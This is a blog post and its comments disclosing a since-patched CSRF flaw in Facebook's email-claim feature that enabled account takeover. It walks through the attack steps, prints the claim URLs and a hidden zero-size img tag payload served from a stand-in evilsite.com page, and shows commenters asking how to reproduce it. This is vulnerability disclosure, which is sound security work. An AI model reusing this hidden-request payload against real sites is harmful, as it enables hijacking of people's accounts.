A critical vulnerability exists in Facebook that would allow a hacker to easily take complete control over any Facebook account. If the victim is logged into Facebook, all a hacker has to do is get the victim to visit a website link. Once the link has loaded, the attacker is able to reset the victim's password.
The vulnerability exists in the "claim email address" component of Facebook.
When a user tries to add an email address that already exists in the Facebook system, they have the option to "claim it".
When claiming an email address, Facebook did not check who the request came from. This allows an email to be claimed on any Facebook account.
In order to exploit this, you need 2 Facebook accounts.
1. An account with the email address (that you want to claim) already added to it.
2. Another account to initiate the claim process.
For example:
When making a claim request for a @hotmail.com email, you are taken to a link that looks like this:
https://www.facebook.com/support/openid/proxy_hotmail.php?appdata[fbid]=AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs
Updated (July 16th):
--------------------------------------------------------------------------------------------------
Some people asked me to clarify how I got the link above, so I've added 2 new visuals below:
After the exploit was fully patched, here is what happens when you try to claim an email:
Now since I did not take a screenshot of the claim process before the patch, I will provide an edited image of what the Claim popup dialog looked like: (its not exact):
Clicking on the "Claim" button would automatically redirect you to the link above
--------------------------------------------------------------------------------------------------
I found out that this parameter appdata[fbid] was the encrypted email address. For this demonstration, the encrypted email was "funnyluv196@hotmail.com". The link will redirect you to the sign in page for Hotmail. You must sign in with the email address that matches the encrypted parameter. Once signed in, you are taken to a final link that looks like this:
https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026
Viewing the source code will show that the claim email process has succeeded:
<script type="text/javascript">window.opener.location.href = "\/claim_email\/add_email\/check_code?email=funnyluv196\u002540hotmail.com&openid=1"; window.close();</script>There were two important aspects which made this exploit simple.
- The link expires in around 3 hours, giving plenty of time for a hacker's use.
- It can be visited on any Facebook account because there is no check to see who made this request.
All a hacker has to do is insert this link on a webpage as either an image or an iframe. Example:
<img src="https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026" width="0" height="0"/>The victim is now sent a link
http://evilsite.com/evilpage.html
Once clicked, the email (in this case: funnyluv196@hotmail.com) is instantly added to their Facebook account. The victim does not receive any notification whatsoever that this email has been added.
The hacker can then reset the victim's password using the newly added email address. Thus allowing the attacker to take complete control over the Facebook account.
This vulnerability has been confirmed to be patched by the Facebook Security Team.
Video Demonstration Below:
(HD option is available.)
~Dan Melamed
how did u decrypt the code? n what kinda encryption is that?
ReplyDeleteI never decrypted the fbid parameter. When I attempt to add an email address that already belongs to another facebook account, a popup shows up asking me if I want to "claim it", clicking on that would generate the fbid parameter inside that link and you'de go on from there.
DeleteCan You Pls explain me How did u get this link..??? https://www.facebook.com/support/openid/proxy_hotmail.php?appdata[fbid]=AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs
Deleteas you can to send this link to victim? as I put my email?
ReplyDeleteonce you have the final link you can send it to anyone and it'll add your email to their account. But please remember that this is already been patched.
Deletehow do I make the request for complaint to the email?
ReplyDeleteCritical Facebook vulnerability allows account hacking
ReplyDeletehttp://www.dan-melamed.com/2013/06/hacking-any-facebook-account-exploit-poc.html
how to generate this link...
ReplyDeletehttps://www.facebook.com/support/openid/proxy_hotmail.php?appdata[fbid]=AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs
or its just for copy and paste?
I've explained this in one of the comments posted on my YouTube video.
DeleteFriend but the method works yet or already corrected this error facebook
ReplyDeleteIt is already patched? so we are wasting our time trying it right?
ReplyDeleteHi Dan, thanks for sharing the details of this flaw.
ReplyDeleteAs far as I can see, Facebook uses Hotmail's API in the claiming process and I am wondering how much this has to do with the vulnerability. What can you say about this point? Have you tried with non hotmail email addresses?
Yes, the other two vulnerable addresses were Gmail and Yahoo. But both of them used an openid link which was vulnerable to CSRF too. But that issue was fixed before I was able to record a video. So for simplicity, I wrote about the hotmail flaw.
Delete